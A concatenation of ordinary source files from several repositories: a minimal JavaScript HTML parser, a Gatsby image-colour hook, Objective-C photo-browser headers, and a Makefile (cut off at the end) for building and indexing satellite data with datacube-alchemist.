node,
actions: { createNode, createNodeField },
loadNodeContent,
createNodeId,
createContentDigest,
}) => {
if (
node.internal.mediaType !== 'image/png' &&
node.internal.mediaType !== 'image/jpeg'
) {
return
}
const dominantColor = await getColorFromURL(node.relativePath)
const colorPalette = await getPaletteFromURL(node.relativePath)
const sortedColorPalette = colorPalette.sort(
(colorA, colorB) => luminance(colorA) - luminance(colorB)
)
createNodeField({ node, name: 'dominantColor', value: dominantColor })
createNodeField({ node, name: 'colorPalette', value: sortedColorPalette })
}
| crosscompile/release-notes |
<|start_filename|>dist/mini-html-parser.js<|end_filename|>
;(function(){
/**
* Require the given path.
*
* @param {String} path
* @return {Object} exports
* @api public
*/
function require(path, parent, orig) {
var resolved = require.resolve(path);
// lookup failed
if (null == resolved) {
orig = orig || path;
parent = parent || 'root';
var err = new Error('Failed to require "' + orig + '" from "' + parent + '"');
err.path = orig;
err.parent = parent;
err.require = true;
throw err;
}
var module = require.modules[resolved];
// perform real require()
// by invoking the module's
// registered function
if (!module._resolving && !module.exports) {
var mod = {};
mod.exports = {};
mod.client = mod.component = true;
module._resolving = true;
module.call(this, mod.exports, require.relative(resolved), mod);
delete module._resolving;
module.exports = mod.exports;
}
return module.exports;
}
/**
* Registered modules.
*/
require.modules = {};
/**
* Registered aliases.
*/
require.aliases = {};
/**
* Resolve `path`.
*
* Lookup:
*
* - PATH/index.js
* - PATH.js
* - PATH
*
* @param {String} path
* @return {String} path or null
* @api private
*/
require.resolve = function(path) {
if (path.charAt(0) === '/') path = path.slice(1);
var paths = [
path,
path + '.js',
path + '.json',
path + '/index.js',
path + '/index.json'
];
for (var i = 0; i < paths.length; i++) {
var path = paths[i];
if (require.modules.hasOwnProperty(path)) return path;
if (require.aliases.hasOwnProperty(path)) return require.aliases[path];
}
};
/**
* Normalize `path` relative to the current path.
*
* @param {String} curr
* @param {String} path
* @return {String}
* @api private
*/
require.normalize = function(curr, path) {
var segs = [];
if ('.' != path.charAt(0)) return path;
curr = curr.split('/');
path = path.split('/');
for (var i = 0; i < path.length; ++i) {
if ('..' == path[i]) {
curr.pop();
} else if ('.' != path[i] && '' != path[i]) {
segs.push(path[i]);
}
}
return curr.concat(segs).join('/');
};
/**
* Register module at `path` with callback `definition`.
*
* @param {String} path
* @param {Function} definition
* @api private
*/
require.register = function(path, definition) {
require.modules[path] = definition;
};
/**
* Alias a module definition.
*
* @param {String} from
* @param {String} to
* @api private
*/
require.alias = function(from, to) {
if (!require.modules.hasOwnProperty(from)) {
throw new Error('Failed to alias "' + from + '", it does not exist');
}
require.aliases[to] = from;
};
/**
* Return a require function relative to the `parent` path.
*
* @param {String} parent
* @return {Function}
* @api private
*/
require.relative = function(parent) {
var p = require.normalize(parent, '..');
/**
* lastIndexOf helper.
*/
function lastIndexOf(arr, obj) {
var i = arr.length;
while (i--) {
if (arr[i] === obj) return i;
}
return -1;
}
/**
* The relative require() itself.
*/
function localRequire(path) {
var resolved = localRequire.resolve(path);
return require(resolved, parent, path);
}
/**
* Resolve relative to the parent.
*/
localRequire.resolve = function(path) {
var c = path.charAt(0);
if ('/' == c) return path.slice(1);
if ('.' == c) return require.normalize(p, path);
// resolve deps by returning
// the dep in the nearest "deps"
// directory
var segs = parent.split('/');
var i = lastIndexOf(segs, 'deps') + 1;
if (!i) i = 0;
path = segs.slice(0, i + 1).join('/') + '/deps/' + path;
return path;
};
/**
* Check if module is defined at `path`.
*/
localRequire.exists = function(path) {
return require.modules.hasOwnProperty(localRequire.resolve(path));
};
return localRequire;
};
require.register("visionmedia-debug/index.js", function(exports, require, module){
if ('undefined' == typeof window) {
module.exports = require('./lib/debug');
} else {
module.exports = require('./debug');
}
});
require.register("visionmedia-debug/debug.js", function(exports, require, module){
/**
* Expose `debug()` as the module.
*/
module.exports = debug;
/**
* Create a debugger with the given `name`.
*
* @param {String} name
* @return {Type}
* @api public
*/
function debug(name) {
if (!debug.enabled(name)) return function(){};
return function(fmt){
fmt = coerce(fmt);
var curr = new Date;
var ms = curr - (debug[name] || curr);
debug[name] = curr;
fmt = name
+ ' '
+ fmt
+ ' +' + debug.humanize(ms);
// This hackery is required for IE8
// where `console.log` doesn't have 'apply'
window.console
&& console.log
&& Function.prototype.apply.call(console.log, console, arguments);
}
}
/**
* The currently active debug mode names.
*/
debug.names = [];
debug.skips = [];
/**
* Enables a debug mode by name. This can include modes
* separated by a colon and wildcards.
*
* @param {String} name
* @api public
*/
debug.enable = function(name) {
try {
localStorage.debug = name;
} catch(e){}
var split = (name || '').split(/[\s,]+/)
, len = split.length;
for (var i = 0; i < len; i++) {
name = split[i].replace('*', '.*?');
if (name[0] === '-') {
debug.skips.push(new RegExp('^' + name.substr(1) + '$'));
}
else {
debug.names.push(new RegExp('^' + name + '$'));
}
}
};
/**
* Disable debug output.
*
* @api public
*/
debug.disable = function(){
debug.enable('');
};
/**
* Humanize the given `ms`.
*
* @param {Number} m
* @return {String}
* @api private
*/
debug.humanize = function(ms) {
var sec = 1000
, min = 60 * 1000
, hour = 60 * min;
if (ms >= hour) return (ms / hour).toFixed(1) + 'h';
if (ms >= min) return (ms / min).toFixed(1) + 'm';
if (ms >= sec) return (ms / sec | 0) + 's';
return ms + 'ms';
};
/**
* Returns true if the given mode name is enabled, false otherwise.
*
* @param {String} name
* @return {Boolean}
* @api public
*/
debug.enabled = function(name) {
for (var i = 0, len = debug.skips.length; i < len; i++) {
if (debug.skips[i].test(name)) {
return false;
}
}
for (var i = 0, len = debug.names.length; i < len; i++) {
if (debug.names[i].test(name)) {
return true;
}
}
return false;
};
/**
* Coerce `val`.
*/
function coerce(val) {
if (val instanceof Error) return val.stack || val.message;
return val;
}
// persist
try {
if (window.localStorage) debug.enable(localStorage.debug);
} catch(e){}
});
require.register("mini-html-parser/index.js", function(exports, require, module){
/**
* Module exports
*/
var debug = require('debug')('html-parser');
/**
* Expose `Parser`
*/
exports = module.exports = Parser;
/**
* Simplified DOM nodes
*/
var nodes = exports.nodes = {
comment : require('./nodes/comment'),
element : require('./nodes/element'),
text : require('./nodes/text')
};
/**
* HTML5 Empty Elements
*/
var empty = { area: true, base: true, basefont: true, br: true, col: true, command: true, embed: true, frame: true, hr: true, img: true, input: true, isindex: true, keygen: true, link: true, meta: true, param: true, source: true, track: true, wbr: true };
/**
* Special tags that can contain anything
*/
var special = { script: true, style: true };
/**
* Attributes that autofill
*/
var autofill = { autofocus: true, autoplay: true, async: true, checked: true, controls: true, defer: true, disabled: true, hidden: true, loop: true, multiple: true, open: true, readonly: true, required: true, scoped: true, selected: true }
/**
* Regexs
*/
var rcomment = /^<!--([\s\S]*)-->/;
var rstarttag = /^<([-A-Za-z0-9_]+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/;
var rattr = /([-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g;
var rendtag = /^<\/([-A-Za-z0-9_]+)[^>]*>/;
var rtext = /^[^<]+/;
/**
* Create regex for special tags
*/
var rspecial = {};
for (var tag in special) rspecial[tag] = new RegExp('<\/' + tag + '[^>]*>', 'i');
/**
* Create a new `Parser`
*
* @param {String} html
* @return {Parser}
* @api public
*/
function Parser(html) {
if (!(this instanceof Parser)) return new Parser(html);
this.html = this.original = html;
this.tokens = [];
this.root = this.tree = [];
this.err = null;
this.parent = null;
}
/**
* Parse all the nodes
*
* @return {Object|Error} dom
* @api public
*/
Parser.prototype.parse = function() {
while (!this.err && this.advance() != 'eos');
return this.err ? this.err : this.root;
}
/**
* Advance to the next token
*
* @return {String} token
* @api public
*/
Parser.prototype.advance = function() {
var tok = this.eos()
|| this.comment()
|| this.endtag()
|| this.starttag()
|| this.text()
|| this.error()
this.tokens.push(tok);
return tok;
}
/**
* Consume the given `len`.
*
* @param {Number|Array} len
* @api private
*/
Parser.prototype.skip = function(len){
this.html = this.html.substr(Array.isArray(len)
? len[0].length
: len);
};
/**
* End of string
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.eos = function() {
if (!this.html.length) return 'eos';
};
/**
* Comment
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.comment = function() {
var captures;
if (captures = rcomment.exec(this.html)) {
this.skip(captures);
var node = nodes.comment(captures[1]);
debug('<!-- %s -->', captures[1]);
// connect it to the DOM
this.connect(node);
return 'comment';
}
};
/**
* Start Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.starttag = function() {
var captures;
if (captures = rstarttag.exec(this.html)) {
this.skip(captures);
var name = captures[1].toLowerCase();
var attrs = (captures[2]) ? attributes(captures[2]) : {};
var node = nodes.element(name, attrs, this.parent);
debug('<%s>', name)
// connect it to the DOM
this.connect(node);
// handle self-closing tags
// and special tags that can
// contain any content
if (special[name]) {
node = this.special(node);
} else if(!empty[name]) {
this.tree = node.childNodes;
this.parent = node;
}
return 'start-tag';
}
};
/**
* End Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.endtag = function() {
var captures;
if (captures = rendtag.exec(this.html)) {
this.skip(captures);
debug('</%s>', captures[1]);
// move up a level
if (!this.parent) return this.error('No end tag for <' + captures[1] + '>.');
this.parent = this.parent.parentNode;
this.tree = (this.parent) ? this.parent.childNodes : this.root;
return 'end-tag';
}
};
/**
* Text Nodes
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.text = function() {
var captures;
if (captures = rtext.exec(this.html)) {
this.skip(captures);
var node = nodes.text(captures[0], this.parent);
debug(node.nodeValue);
// connect it to the DOM
this.connect(node);
return 'text';
}
};
/**
* Handle special tags (ex. script, style)
* that can contain any content including "<".
*
* @param {Object} node
* @return {Object} node
*/
Parser.prototype.special = function(node) {
var name = node.nodeName.toLowerCase();
var captures = rspecial[name].exec(this.html);
if (!captures) return this.error('No ending ' + name + ' tag.');
// extract the contents of the tag
var text = this.html.slice(0, captures.index);
// connect DOM
var textnode = nodes.text(text, node);
node.childNodes.push(textnode);
// skip text + length of match
this.skip(text.length + captures[0].length);
return node;
};
/**
* Connect the DOM tree
*
* @param {Object} node
* @return {Parser}
* @api private
*/
Parser.prototype.connect = function(node) {
this.tree.push(node);
var prev = this.tree[this.tree.length - 1];
if (prev) {
prev.nextSibling = node;
node.previousSibling = prev;
}
return this;
}
/**
* Handle errors
*
* @param {String} err (optional)
* @return {String}
* @api private
*/
Parser.prototype.error = function(err) {
var original = this.original;
var ellipsis = '\u2026';
var caret = '\u2038';
var i = original.length - this.html.length;
// provide a useful error
var at = original.slice(i - 20, i) + caret + original.slice(i, i + 20)
at = original[i - 20] ? ellipsis + at : at
at += original[i + 20] ? ellipsis : '';
// add the message
var msg = err || 'Parsing error.';
msg += ' Near: ' + at;
// set the error
this.err = new Error(msg);
return 'error';
};
/**
* Parse attributes
*
* @param {String} str
* @return {Object}
* @api private
*/
function attributes(str) {
var attrs = {};
str.replace(rattr, function(match, name) {
attrs[name] = arguments[2] || arguments[3] || arguments[4] || autofill[name] || '';
});
return attrs;
}
});
require.register("mini-html-parser/nodes/comment.js", function(exports, require, module){
/**
* Export `comment`
*/
module.exports = comment;
/**
* Create `comment` node
*
* @param {String} value
*/
function comment(value) {
return {
nodeType: 8,
nodeValue: value,
nextSibling: null,
nodeName: '#comment',
previousSibling: null,
parentNode: parent || null
};
}
});
require.register("mini-html-parser/nodes/element.js", function(exports, require, module){
/**
* Export `element`
*/
module.exports = element;
/**
* Create `element` node
*
* @param {String} tag
*/
function element(tag, attrs, parent) {
return {
nodeType: 1,
childNodes: [],
nextSibling: null,
previousSibling: null,
attributes: attrs || {},
parentNode: parent || null,
nodeName: tag.toUpperCase()
};
}
});
require.register("mini-html-parser/nodes/text.js", function(exports, require, module){
/**
* Export `text`
*/
module.exports = text;
/**
* Create `text` node
*
* @param {String} tag
*/
function text(value, parent) {
return {
nodeType: 3,
nodeValue: value,
nodeName: '#text',
nextSibling: null,
previousSibling: null,
parentNode: parent || null
};
}
});
require.alias("visionmedia-debug/index.js", "mini-html-parser/deps/debug/index.js");
require.alias("visionmedia-debug/debug.js", "mini-html-parser/deps/debug/debug.js");
require.alias("visionmedia-debug/index.js", "debug/index.js");
require.alias("mini-html-parser/index.js", "mini-html-parser/index.js");if (typeof exports == "object") {
module.exports = require("mini-html-parser");
} else if (typeof define == "function" && define.amd) {
define(function(){ return require("mini-html-parser"); });
} else {
this["mini-html-parser"] = require("mini-html-parser");
}})();
<|start_filename|>nodes/text.js<|end_filename|>
/**
* Export `text`
*/
module.exports = text;
/**
* Create `text` node
*
* @param {String} tag
* @param {Object|null} parent
*/
function text(value, parent) {
return {
nodeType: 3,
childNodes: [],
nodeValue: value,
nodeName: '#text',
nextSibling: null,
previousSibling: null,
parentNode: parent || null
};
}
<|start_filename|>nodes/element.js<|end_filename|>
/**
* Export `element`
*/
module.exports = element;
/**
* Create `element` node
*
* @param {String} tag
* @param {Object|null} attrs
* @param {Object|null} parent
*/
function element(tag, attrs, parent) {
return {
nodeType: 1,
childNodes: [],
nextSibling: null,
previousSibling: null,
attributes: attrs || {},
parentNode: parent || null,
nodeName: tag.toUpperCase()
};
}
<|start_filename|>nodes/fragment.js<|end_filename|>
/**
* Export `fragment`
*/
module.exports = fragment;
/**
* Create `fragment` node
*
* @return {Object} fragment
*/
function fragment() {
return {
nodeType: 11,
childNodes: [],
parentNode: null,
nextSibling: null,
previousSibling: null,
nodeName: '#fragment'
};
}
<|start_filename|>nodes/comment.js<|end_filename|>
/**
* Export `comment`
*/
module.exports = comment;
/**
* Create `comment` node
*
* @param {String} value
* @param {Object|null} parent
*/
function comment(value, parent) {
return {
nodeType: 8,
nodeValue: value,
nextSibling: null,
nodeName: '#comment',
previousSibling: null,
parentNode: parent || null
};
}
<|start_filename|>index.js<|end_filename|>
/**
* Module exports
*/
var debug = require('debug')('html-parser');
/**
* Expose `Parser`
*/
exports = module.exports = Parser;
/**
* Simplified DOM nodes
*/
var nodes = exports.nodes = {
fragment : require('./nodes/fragment'),
comment : require('./nodes/comment'),
element : require('./nodes/element'),
text : require('./nodes/text')
};
/**
* HTML5 Empty Elements
*/
var empty = { area: true, base: true, basefont: true, br: true, col: true, command: true, embed: true, frame: true, hr: true, img: true, input: true, isindex: true, keygen: true, link: true, meta: true, param: true, source: true, track: true, wbr: true };
/**
* Special tags that can contain anything
*/
var special = { script: true, style: true };
/**
* Attributes that autofill
*/
var autofill = { autofocus: true, autoplay: true, async: true, checked: true, controls: true, defer: true, disabled: true, hidden: true, loop: true, multiple: true, open: true, readonly: true, required: true, scoped: true, selected: true }
/**
* Regexs
*/
var rcomment = /^<!--([\s\S]*)-->/;
var rstarttag = /^<([-A-Za-z0-9_]+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/;
var rattr = /([-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g;
var rendtag = /^<\/([-A-Za-z0-9_]+)[^>]*>/;
var rtext = /^[^<]+/;
/**
* Create regex for special tags
*/
var rspecial = {};
for (var tag in special) rspecial[tag] = new RegExp('<\/' + tag + '[^>]*>', 'i');
/**
* Create a new `Parser`
*
* @param {String} html
* @return {Parser}
* @api public
*/
function Parser(html) {
if (!(this instanceof Parser)) return new Parser(html);
if ('string' != typeof html) throw new TypeError('String expected');
this.html = this.original = html;
this.tokens = [];
this.parent = this.root = nodes.fragment();
this.tree = this.parent.childNodes;
this.err = null;
}
/**
* Parse all the nodes
*
* @return {Object|Error} dom
* @api public
*/
Parser.prototype.parse = function() {
while (!this.err && this.advance() != 'eos');
if (this.err) return this.err;
var children = this.root.childNodes;
// one element
if (1 == children.length) {
children[0].parentNode = null;
return children[0];
}
// several elements
return this.root;
}
/**
* Advance to the next token
*
* @return {String} token
* @api public
*/
Parser.prototype.advance = function() {
var tok = this.eos()
|| this.comment()
|| this.endtag()
|| this.starttag()
|| this.text()
|| this.error()
this.tokens.push(tok);
return tok;
}
/**
* Consume the given `len`.
*
* @param {Number|Array} len
* @api private
*/
Parser.prototype.skip = function(len){
this.html = this.html.substr(Array.isArray(len)
? len[0].length
: len);
};
/**
* End of string
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.eos = function() {
if (!this.html.length) return 'eos';
};
/**
* Comment
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.comment = function() {
var captures;
if (captures = rcomment.exec(this.html)) {
this.skip(captures);
var node = nodes.comment(captures[1], this.parent);
debug('<!-- %s -->', captures[1]);
// connect it to the DOM
this.connect(node);
return 'comment';
}
};
/**
* Start Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.starttag = function() {
var captures;
if (captures = rstarttag.exec(this.html)) {
this.skip(captures);
var name = captures[1].toLowerCase();
var attrs = (captures[2]) ? attributes(captures[2]) : {};
var node = nodes.element(name, attrs, this.parent);
debug('<%s>', name)
// connect it to the DOM
this.connect(node);
// handle self-closing tags
// and special tags that can
// contain any content
if (special[name]) {
node = this.special(node);
} else if(!empty[name]) {
this.tree = node.childNodes;
this.parent = node;
}
return 'start-tag';
}
};
/**
* End Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.endtag = function() {
var captures;
if (captures = rendtag.exec(this.html)) {
this.skip(captures);
debug('</%s>', captures[1]);
// move up a level
this.parent = this.parent.parentNode;
this.tree = this.parent.childNodes;
return 'end-tag';
}
};
/**
* Text Nodes
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.text = function() {
var captures;
if (captures = rtext.exec(this.html)) {
this.skip(captures);
var node = nodes.text(captures[0], this.parent);
debug(node.nodeValue);
// connect it to the DOM
this.connect(node);
return 'text';
}
};
/**
* Handle special tags (ex. script, style)
* that can contain any content including "<".
*
* @param {Object} node
* @return {Object} node
*/
Parser.prototype.special = function(node) {
var name = node.nodeName.toLowerCase();
var captures = rspecial[name].exec(this.html);
if (!captures) return this.error('No ending ' + name + ' tag.');
// extract the contents of the tag
var text = this.html.slice(0, captures.index);
// connect DOM
var textnode = nodes.text(text, node);
node.childNodes.push(textnode);
// skip text + length of match
this.skip(text.length + captures[0].length);
return node;
};
/**
* Connect the DOM tree
*
* @param {Object} node
* @return {Parser}
* @api private
*/
Parser.prototype.connect = function(node) {
// fetch the previous DOM node
var prev = this.tree[this.tree.length - 1];
// first child
if (!this.tree.length) this.parent.firstChild = node;
// add node to DOM tree
this.tree.push(node);
// last child
this.parent.lastChild = node;
// set previous and next siblings
if (prev) {
prev.nextSibling = node;
node.previousSibling = prev;
}
return this;
}
/**
* Handle errors
*
* @param {String} err (optional)
* @return {String}
* @api private
*/
Parser.prototype.error = function(err) {
var original = this.original;
var ellipsis = '\u2026';
var caret = '\u2038';
var i = original.length - this.html.length;
// provide a useful error
var at = original.slice(i - 20, i) + caret + original.slice(i, i + 20)
at = original[i - 20] ? ellipsis + at : at
at += original[i + 20] ? ellipsis : '';
// add the message
var msg = err || 'Parsing error.';
msg += ' Near: ' + at;
// set the error
this.err = new Error(msg);
return 'error';
};
/**
* Parse attributes
*
* @param {String} str
* @return {Object}
* @api private
*/
function attributes(str) {
var attrs = {};
str.replace(rattr, function(match, name) {
attrs[name] = arguments[2] || arguments[3] || arguments[4] || autofill[name] || '';
});
return attrs;
}
<|start_filename|>component.json<|end_filename|>
{
"name": "mini-html-parser",
"repo": "matthewmueller/mini-html-parser",
"description": "mini html parser for webworkers & node",
"version": "0.0.3",
"keywords": [
"html",
"parser"
],
"dependencies": {
"visionmedia/debug": "0.7.4"
},
"development": {},
"license": "MIT",
"main": "index.js",
"scripts": [
"index.js",
"nodes/comment.js",
"nodes/element.js",
"nodes/fragment.js",
"nodes/text.js"
]
}
| matthewmueller/mini-html-parser |
<|start_filename|>PYPhotoBrowser/Controller/PYPhotosReaderController.h<|end_filename|>
// 代码地址: https://github.com/iphone5solo/PYPhotosView
// 代码地址: http://code4app.com/thread-8612-1-1.html
// Created by CoderKo1o.
// Copyright © 2016年 iphone5solo. All rights reserved.
// 浏览图片的控制器(一般用于网络片浏览)
#import <UIKit/UIKit.h>
@class PYPhotoView, PYPhotosView, PYPhotoBrowseView;
@interface PYPhotosReaderController : UICollectionViewController
/** 快速创建图片浏览器 */
+ (instancetype)readerController;
/** 显示图片到指定控制器 */
- (void)showPhotosToWindow:(PYPhotoBrowseView *)window;
/** 隐藏图片 */
- (void)hiddenPhoto;
/** 选中的照片的view*/
@property (nonatomic, weak) PYPhotoView *selectedPhotoView;
/** 复制的view*/
@property (nonatomic, weak) PYPhotoView *beginView;
@end
<|start_filename|>PYPhotoBrowser/Category/MBProgressHUD+PYExtension.h<|end_filename|>
#if __has_include(<MBProgressHUD/MBProgressHUD.h>)
#import <MBProgressHUD/MBProgressHUD.h>
#else
#import "MBProgressHUD.h"
#endif
@interface MBProgressHUD (PY)
/** 显示成功信息 */
+ (void)py_showSuccess:(NSString *)success toView:(UIView *)view;
/** 显示失败信息 */
+ (void)py_showError:(NSString *)error toView:(UIView *)view;
/** 显示加载信息 */
+ (void)py_showLoading:(NSString *)loading toView:(UIView *)view;
@end
<|start_filename|>PYPhotoBrowser/Other/PYProgressView.h<|end_filename|>
// 代码地址: https://github.com/iphone5solo/PYPhotosView
// 代码地址: http://code4app.com/thread-8612-1-1.html
// Created by CoderKo1o.
// Copyright © 2016年 iphone5solo. All rights reserved.
// 继承DALabeledCircularProgressView类
#if __has_include(<DACircularProgress/DALabeledCircularProgressView.h>)
#import <DACircularProgress/DALabeledCircularProgressView.h>
#else
#import "DALabeledCircularProgressView.h"
#endif
@interface PYProgressView : DALabeledCircularProgressView
/** 设置加载进度 */
- (void)py_setProgress:(CGFloat)progress animated:(BOOL)animated;
@end
| jfdream/PYPhotoBrowser |
<|start_filename|>Makefile<|end_filename|>
build-image:
docker build . \
--tag opendatacube/datacube-alchemist:test \
--build-arg ENVIRONMENT=test
build-prod-image:
docker build . \
--tag opendatacube/datacube-alchemist:latest \
--build-arg ENVIRONMENT=deployment
run-prod:
docker run --rm \
opendatacube/datacube-alchemist
test-local:
pytest tests
# Docker Compose environment
build:
docker-compose build
up:
docker-compose up
down:
docker-compose down
shell:
docker-compose exec alchemist bash
test:
docker-compose exec alchemist pytest tests
lint:
docker-compose exec alchemist black --check datacube_alchemist
integration-test:
docker-compose up -d
docker-compose exec -T alchemist bash ./tests/integration_tests.sh
# C3 Related
initdb:
docker-compose exec alchemist \
datacube system init
metadata:
docker-compose exec alchemist \
datacube metadata add https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/eo3_landsat_ard.odc-type.yaml
product:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls5.odc-product.yaml \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls7.odc-product.yaml \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls8.odc-product.yaml
index:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/baseline/ga_ls8c_ard_3/098/073/2020/07/19/ga_ls8c_ard_3-1-0_098073_2020-07-19_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls5t_ard_3/108/083/2010/10/02/ga_ls5t_ard_3-0-0_108083_2010-10-02_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls7e_ard_3/100/075/2003/10/15/ga_ls7e_ard_3-0-0_100075_2003-10-15_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls8c_ard_3/091/089/2019/01/20/ga_ls8c_ard_3-0-0_091089_2019-01-20_final.odc-metadata.yaml
# Landsat geomedian
index-geomedian:
docker-compose exec alchemist \
bash -c "\
datacube product add https://data.dea.ga.gov.au/geomedian-australia/v2.1.0/product-definition.yaml;\
s3-to-dc --no-sign-request 's3://dea-public-data/geomedian-australia/v2.1.0/L8/**/*.yaml' ls8_nbart_geomedian_annual\
"
# s2a required for on-the-fly gm calculation
product-s2a:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/s2_ard_granule.odc-product.yaml
index-s2a:
docker-compose exec alchemist \
bash -c "\
s3-to-dc --no-sign-request 's3://dea-public-data/baseline/s2a_ard_granule/**/*.yaml' s2a_ard_granule\
"
# Barest Earth required for NRT calculation
product-s2be:
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/s2_barest_earth.odc-product.yaml
index-s2be:
docker-compose exec alchemist \
bash -c "\
s3-to-dc --no-sign-request 's3://dea-public-data-dev/s2be/*/*odc-metadata.yaml' s2_barest_earth\
"
# Add s2 c3 datasets
product-s2-c3:
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/ga_s2am_ard_provisional_3.odc-product.yaml
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/ga_s2bm_ard_provisional_3.odc-product.yaml
index-s2-c3:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/baseline/ga_s2am_ard_provisional_3/51/KWV/2021/08/18_nrt/20210818T033715/ga_s2am_ard_provisional_3-2-1_51KWV_2021-08-18_nrt.odc-metadata.yaml \
# Specific BE dataset for local testing
index-one-s2be:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
https://dea-public-data-dev.s3.ap-southeast-2.amazonaws.com/s2be/s2be-SG5006.odc-metadata.yaml
metadata-s2-nrt:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/eo_s2_nrt.odc-type.yaml
product-s2-nrt:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/s2_nrt.products.yaml
metadata-eo_plus:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/opendatacube/datacube-dataset-config/master/metadata_types/eo_plus.odc-type.yaml
index-s2-nrt:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-12/S2B_OPER_MSI_ARD_TL_VGS4_20210512T014256_A021835_T56JKM_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-05/S2B_OPER_MSI_ARD_TL_VGS4_20210506T011341_A021749_T56GMA_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-05/S2A_OPER_MSI_ARD_TL_VGS4_20210505T024121_A030644_T53LRJ_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-18/S2A_OPER_MSI_ARD_TL_VGS4_20210518T025201_A030830_T53KLV_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-16/S2A_OPER_MSI_ARD_TL_VGS1_20210516T054329_A030802_T50JMS_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-06-18/S2A_OPER_MSI_ARD_TL_VGS4_20210618T022813_A031273_T54LXJ_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-06-20/S2B_OPER_MSI_ARD_TL_VGS4_20210620T015752_A022393_T55LBC_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-02/S2B_OPER_MSI_ARD_TL_VGS1_20210702T024204_A022565_T53KNT_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-07/S2B_OPER_MSI_ARD_TL_VGS1_20210707T014852_A022636_T54HWC_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-08/S2A_OPER_MSI_ARD_TL_VGS4_20210708T022548_A031559_T54HTJ_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-03/S2A_OPER_MSI_ARD_TL_VGS4_20210703T013119_A031487_T55HFB_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-31/S2B_OPER_MSI_ARD_TL_VGS4_20210731T011212_A022979_T56JKT_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-08-05/S2A_OPER_MSI_ARD_TL_VGS4_20210805T013351_A031959_T56JKT_N03.01/ARD-METADATA.yaml
metadata-s2-c3-prov:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/eo_s2_nrt.odc-type.yaml
product-s2-c3-prov:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_s2a_provisional.odc-product.yaml
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_s2b_provisional.odc-product.yaml
index-s2-c3-prov:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
